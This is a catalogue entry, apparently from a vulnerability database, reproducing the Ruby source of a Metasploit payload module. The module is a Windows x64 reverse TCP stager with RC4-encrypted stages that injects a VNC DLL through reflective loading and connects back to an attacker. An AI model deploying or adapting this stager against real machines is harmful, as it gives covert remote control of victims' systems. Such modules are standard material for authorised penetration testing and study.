Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)

2018-02-04T07:01:27
ID MSF:PAYLOAD/WINDOWS/X64/VNCINJECT/REVERSE_TCP_RC4
Type metasploit
Reporter Rapid7
Modified 2018-03-04T23:43:15

Description

Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker

                                        
                                            # -*- coding: binary -*-
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/windows/x64/reverse_tcp_rc4'


module MetasploitModule

  CachedSize = 585

  include Msf::Payload::Stager
  include Msf::Payload::Windows::ReverseTcpRc4_x64

  def self.handler_type_alias
    "reverse_tcp_rc4"
  end

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Reverse TCP Stager (RC4 Stage Encryption, Metasm)',
      'Description'   => 'Connect back to the attacker',
      'Author'        => ['hdm', 'skape', 'sf', 'mihi', 'max3raza', 'RageLtMan'],
      'License'       => MSF_LICENSE,
      'Platform'      => 'win',
      'Arch'          => ARCH_X64,
      'Handler'       => Msf::Handler::ReverseTcp,
      'Convention'    => 'sockrdi',
      'Stager'        => { 'RequiresMidstager' => false }
      ))
  end
end